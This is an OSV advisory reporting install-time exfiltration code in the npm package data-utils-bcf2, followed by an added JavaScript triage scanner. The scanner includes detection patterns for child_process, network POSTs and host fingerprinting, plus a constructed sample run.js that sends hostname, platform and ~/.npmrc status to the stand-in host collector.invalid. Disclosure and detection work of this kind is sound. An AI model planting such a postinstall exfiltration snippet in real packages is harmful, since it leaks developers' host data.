{"id":"MAL-2026-6090","summary":"Malicious code in data-utils-bcf2 (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (52e6ddf4cbc1a035918a5bd136c865ff526f430db21268d75d3c90fa74196fdf)\nThe package declares a postinstall lifecycle hook (\"postinstall\": \"node run.js\" in package.json) that automatically executes run.js on install. run.js imports os, fs, http, https, and child_process, collects host identifying information (os.hostname(), os.platform()), reads files from disk (fs.readFileSync, fs.existsSync), and issues multiple POST requests over HTTP/HTTPS (run.js lines 134, 137, 348, 355). The combination of automatic install-time execution, host fingerprinting, filesystem reads, and outbound POSTs is the canonical install-time exfiltration shape. Installing this package on a developer machine or CI runner will run the reconnaissance and exfiltration code without user interaction.\n","modified":"2026-06-18T05:46:39.706820603Z","published":"2026-06-18T03:54:28Z","database_specific":{"malicious-packages-origins":[{"source":"amazon-inspector","versions":["1.0.0"],"modified_time":"2026-06-18T03:54:28Z","sha256":"52e6ddf4cbc1a035918a5bd136c865ff526f430db21268d75d3c90fa74196fdf","id":"IN-MAL-2026-006960","import_time":"2026-06-18T05:42:04.371373899Z"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/data-utils-bcf2/v/1.0.0"}],"affected":[{"package":{"name":"data-utils-bcf2","ecosystem":"npm","purl":"pkg:npm/data-utils-bcf2"},"versions":["1.0.0"],"database_specific":{"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/data-utils-bcf2/MAL-2026-6090.json","cwes":[{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"}],"indicators":{"package_integrity":[{"hashes":{"sha512_sri":"sha512-cockDOMoPNHjz28QODHA21n/5DBJ5ytblFscjWFzHG53stSLKacUikj+jDjKsQ1Htj39ZU7q0bWRfXrl+SJ5nQ==","sha1":"c3a92d7f44c7c0064b0cdd531e84f88bfb7c6e07"},"filename":"data-utils-bcf2-1.0.0.tgz"}],"evidence_files":[{"path":"package.json","tlsh":"ece068289c20393339c02ae80c669297f7308f1b30143d2d92b72829429bb7ab47b24d","sha256":"561e6c852bc499eb123d918890a06d3da33f87965198b84c9ff50c3061499d35"},{"path":"run.js","tlsh":"c382e7b219b7461479a3e6ade66fa4005033f1177a51eda0f28c73510fcf668d1b2af8","sha256":"23c111f3ecd1f37bea0f0fb0b51d6bdac267d3adcfdd52d972f72cda6f82ac42"}]}}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}
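The advisory describes the install-time exfiltration shape as a combination of four things: a lifecycle hook that runs automatically, host fingerprinting, filesystem reads, and outbound POSTs. The following is an added example, not the advisory's, Amazon Inspector's or the package's own code, showing how to triage an unpacked npm package for exactly that combination before installing it. The `package.json` and `run.js` texts in the block are constructed stand-ins (fictitious `sample-pkg`, unresolvable `collector.invalid` host), not the real files from the `data-utils-bcf2-1.0.0.tgz` tarball, and the indicator patterns and capability names are this example's own choices.

```javascript
// Added example (not from the advisory or the package): static triage for the
// hook-launched exfiltration shape. Inputs are pattern-matched, never executed.

// Scripts npm runs without user interaction during install.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Each indicator maps a source-text pattern to the capability it evidences.
const INDICATORS = [
  { cap: "exec",        re: /require\(\s*['"]child_process['"]\s*\)/ },
  { cap: "net",         re: /require\(\s*['"]https?['"]\s*\)/ },
  { cap: "net",         re: /\.request\(\s*\{[^}]*method\s*:\s*['"]POST['"]/s },
  { cap: "fingerprint", re: /\bos\.(hostname|platform|userInfo|networkInterfaces)\(/ },
  { cap: "fsread",      re: /\bfs\.(readFileSync|existsSync|readdirSync)\(/ },
];

// Lifecycle scripts declared by the package, as [hook, command] pairs.
function lifecycleScripts(pkg) {
  const scripts = pkg.scripts || {};
  return LIFECYCLE_HOOKS
    .filter((h) => typeof scripts[h] === "string")
    .map((h) => [h, scripts[h]]);
}

// Capabilities evidenced by one JS source text, as a sorted array.
function capabilities(source) {
  const caps = new Set();
  for (const { cap, re } of INDICATORS) {
    if (re.test(source)) caps.add(cap);
  }
  return [...caps].sort();
}

// Triage one package. `files` maps package-relative paths to file contents.
// A hook-launched file that can reach the network AND fingerprints the host
// or reads the filesystem matches the exfiltration shape.
function triage(pkgJsonText, files) {
  const pkg = JSON.parse(pkgJsonText);
  const hooks = lifecycleScripts(pkg);
  const findings = [];
  for (const [hook, cmd] of hooks) {
    // Crude launch resolution: any packaged file named in the hook command
    // ("node run.js" names run.js). A real scanner would also follow requires.
    for (const path of Object.keys(files)) {
      if (!cmd.includes(path)) continue;
      const caps = capabilities(files[path]);
      const exfilShape =
        caps.includes("net") &&
        (caps.includes("fingerprint") || caps.includes("fsread"));
      findings.push({ hook, cmd, path, caps, exfilShape });
    }
  }
  return {
    package: `${pkg.name}@${pkg.version}`,
    hooks,
    findings,
    verdict: findings.some((f) => f.exfilShape)
      ? "install-time exfiltration shape"
      : "no hook-launched exfiltration shape",
  };
}

// Constructed sample inputs (hypothetical package; collector.invalid is a
// reserved, unresolvable domain). These stand in for the real evidence files.
const SAMPLE_PACKAGE_JSON = JSON.stringify({
  name: "sample-pkg",
  version: "1.0.0",
  scripts: { postinstall: "node run.js", test: "node test.js" },
});

const SAMPLE_RUN_JS = `
const os = require('os'), fs = require('fs'), https = require('https');
const { execSync } = require('child_process');
const info = { host: os.hostname(), plat: os.platform(),
               npmrc: fs.existsSync(process.env.HOME + '/.npmrc') };
const req = https.request({ hostname: 'collector.invalid', method: 'POST', path: '/' });
req.end(JSON.stringify(info));
`;

console.log(JSON.stringify(triage(SAMPLE_PACKAGE_JSON, { "run.js": SAMPLE_RUN_JS }), null, 2));
```

On the constructed sample the verdict is "install-time exfiltration shape" with a single postinstall finding whose capabilities are exec, fingerprint, fsread and net; a package with no lifecycle hooks, or a hook-launched file that reads the filesystem but has no network capability, is not flagged. Pattern matching is a triage aid, not proof: obfuscated or dynamically built `require` calls defeat it, and the integrity hashes in the record above remain the authoritative way to confirm a cached tarball is the flagged artifact. The control that defeats this shape regardless of detection is to stop lifecycle scripts from running at all, with `npm install --ignore-scripts` or `ignore-scripts=true` in `.npmrc`, on developer machines and CI runners alike.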